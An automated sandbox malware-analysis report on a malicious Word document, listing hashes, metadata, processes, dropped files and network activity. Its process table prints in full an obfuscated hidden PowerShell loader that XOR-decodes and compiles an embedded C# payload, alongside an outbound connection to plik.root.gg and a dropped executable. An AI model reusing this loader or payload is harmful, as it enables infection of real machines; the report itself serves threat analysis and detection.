File name: | Debtors Review as on 7.18.2019 .doc |
Full analysis: | https://app.any.run/tasks/e6c1265b-355c-4a71-a07e-758a45f80adb |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 13:38:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Title: o1e44, Subject: p1f21b, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jul 18 08:56:00 2019, Last Saved Time/Date: Thu Jul 18 08:56:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | A5E3811303D8494345734C921B6BC2C9 |
SHA1: | 5C3195F3A9E045DB61531A248477CFF0F0405334 |
SHA256: | 2948787E6709CD5322648262F1E2CB1BB1E4BC921CDCDF81EA759ABA4E552034 |
SSDEEP: | 12288:hDDH2JexyhrAopDEPoqVM22rqxMaA58ewbrH2JexMhrAoTDEPoqC:JbcemAou/zAqOaA58eezcekAos/ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | o1e44 |
---|---|
Subject: | p1f21b |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:07:18 07:56:00 |
ModifyDate: | 2019:07:18 07:56:00 |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Bytes: | 11000 |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 1 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | o1e44 |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3164 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Debtors Review as on 7.18.2019 .doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2908 | powershell -WindowStyle Hidden function ac629 { param($ocbef) $a86a42 = 'l4c4a';$bcd45f1 = ''; for ($i = 0; $i -lt $ocbef.length; $i+=2) { $e4da3 = [convert]::ToByte($ocbef.Substring($i, 2), 16); $bcd45f1 += [char]($e4da3 -bxor $a86a42[($i / 2) % $a86a42.length]); } return $bcd45f1; } $qfc42cf = '19470a5a064c671a47150959584112055a041432154717510c4266165a150559061a28024006460e1c67064617055706475a19470a5a064c671a471509594d70080d530d5b12185d00475a19470a5a064c671a471509594d7d2e5741105d0f0b14304d1218510e1a2f094058396b1c410158080f140058001f474343540e52570d57176f27580d2559135b13181c415f041e5a0658525e164f710f18461a640e055a1709432b5117641303572250051e5110474345694344140e580a57411f400240080f14064c1509460d142802403340134c5a5606055b014b7d0f186417464107000656070f18104013055a04140d5d0d545750450f38700d007d0e440e1e404b160a09460d510d5f06411841295a1746183c5b0a5a154c0943162d03550778080e460246184e1d3e141119560f5d024c4717551505574351191851115a41255a1764151e141752050f0c571c1218460a5a064c59070c545f034a0f3a28580f7d0c1c5b1140494e5f06460f09585006434014265a151e4d335b0802405e163705461741000064115b1509571716483114134103005d0014121855175d024c511b40041e5a43560e0358434e535d565b1c2802403340134c42010d045806571834255a1764151e141451575a0c511841195d0d40411c5156010440140c41154c410a5a154c510751570f55021d5a37700f582801440c4615441628511302510f075342500f58434014265a151e4d335b0802405e163318582e5b17097906590e1e4d4118413f511778001f4026461303465e52000047061d3c4c4717551505574351191851115a411a5b0a50411f06570504447d0d40311846435a53090357074d255a1764151e140d0357590351180802404342030a075b0d00450f134103005d0014121855175d024c5d0d40411e525405505b1c4a4f2802403340134c415405530a564309411852075759581c0257575e0d4b165108015a0551595057525154015b04074e1d4a0f080a1c1603505e5201095c255a1764151e1a395113031d18530e185b434404550c00565a117d0d40311846435e02085507090f590607035444415405530a564f55025a065a1c435e50560d505c010707535c5256015108035505555c555606515a00551648450f0a5249065707550551092a5a153c40111a3b09460c1d1a0b5b175b411c515a0c020e0f1e612802403340134c465b07525b094b6128024033401345015841080240434e525d0550055c5c0f0a52494d4e510503541c0957050d504f46595f07541851140053180e1940434e525d05500548454f045b1503141351585457010f1c2e4d17513a31140956035e0d52091a5c4c50054d5c4c05524d5c4c5a041c577d0d4031184643565354515a5659517902461204550f1a2000580c57292b580c5600001c501d5a21551147090d584d770e1c4d4b5e030e065a054d5c18010659090d010c4d5f1d5847535805061c0f0943437d0f1864174649065707550542600c7d0f1802571c4847041b04515d564a18035e0c060d035418501d5a1c515a0c020e0e4363040e770f5d0402404352050855560c5c02511414360956205808095a171c48574717460802534358005a0056092402420a460e0259065a15427306402703580751133c55175c49295a155d13035a0e510f181a3044040f5d0258270358075113427513440d0557024008035a2755150d1d48163d30555a00000a57411f000f02510d494e005101505d56560543450f0550050d015b1a2503430d580e0d50255d0d091c0257575e0d4b1651580053055658005206545a050100025800535051590105000558025351515f0053000559075302555f01510400590c5300555f0456075059045202500e000006075b06510750090306055759075200515a02560002590153525309045604045c0450035058040006535a0152565159035a01505c505751505903500407590c5200520e0053015658575607535f045401525b055104555e015205035905411d4d0055550054450f33460e0f51104732185511402802520c14050e0357510708090d51164c64115b0209471067150d46177d0f0a5b4b58005a00561d5a3c460c57041f474d67150d46171c050e03575107081d5846041841115a415c0f1e44140e580a57411f400240080f14104013055a0414000f02510d491f40115d0f0b140d5553595750504817471746080253435f55095605575c4e585757550d165847151e5d0d534118520757595809304013055a041a240144174d5a0a5b111c080240435d5c5c0f0a080f0d06565752081a2f510f0b400b0f084709511d1a0e4d17514102015150565909205b0f1a5111404f385b214d15091c0d5553595750504f3f410147151e5d0d53490518511d4d5d024a0f150a50000c5547094b57090d464a1c0f59060703544c6a435f55095605573a445d4c06484c11435f55095605574f20510d531504694a0f1c1e5117411302141752050f0c570f1c11'; $qfc42cf2 = ac629($qfc42cf); Add-Type -TypeDefinition $qfc42cf2; [w5bf496]::rf7117(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2180 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\xbvjcfny.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3396 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESDE3B.tmp" "c:\Users\admin\AppData\Local\Temp\CSCDE3A.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
2140 | "C:\Users\admin\AppData\Roaming\a94afc.exe" | C:\Users\admin\AppData\Roaming\a94afc.exe | — | powershell.exe |
User: admin Company: El Matador Integrity Level: MEDIUM Description: snakeGameX Version: 8.0.4.2 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3164 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD188.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2908 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9BNMX9ENYI0X8EPLPDG5.temp | — | |
MD5:— | SHA256:— | |||
2908 | powershell.exe | C:\Users\admin\AppData\Local\Temp\xbvjcfny.0.cs | — | |
MD5:— | SHA256:— | |||
2908 | powershell.exe | C:\Users\admin\AppData\Local\Temp\xbvjcfny.cmdline | — | |
MD5:— | SHA256:— | |||
2180 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCDE3A.tmp | — | |
MD5:— | SHA256:— | |||
2180 | csc.exe | C:\Users\admin\AppData\Local\Temp\xbvjcfny.pdb | — | |
MD5:— | SHA256:— | |||
3396 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESDE3B.tmp | — | |
MD5:— | SHA256:— | |||
2180 | csc.exe | C:\Users\admin\AppData\Local\Temp\xbvjcfny.dll | — | |
MD5:— | SHA256:— | |||
2180 | csc.exe | C:\Users\admin\AppData\Local\Temp\xbvjcfny.out | — | |
MD5:— | SHA256:— | |||
3164 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\133A09CA.emf | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2908 | powershell.exe | 37.187.19.227:443 | plik.root.gg | OVH SAS | FR | suspicious |
Domain | IP | Reputation |
---|---|---|
plik.root.gg |
| suspicious |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|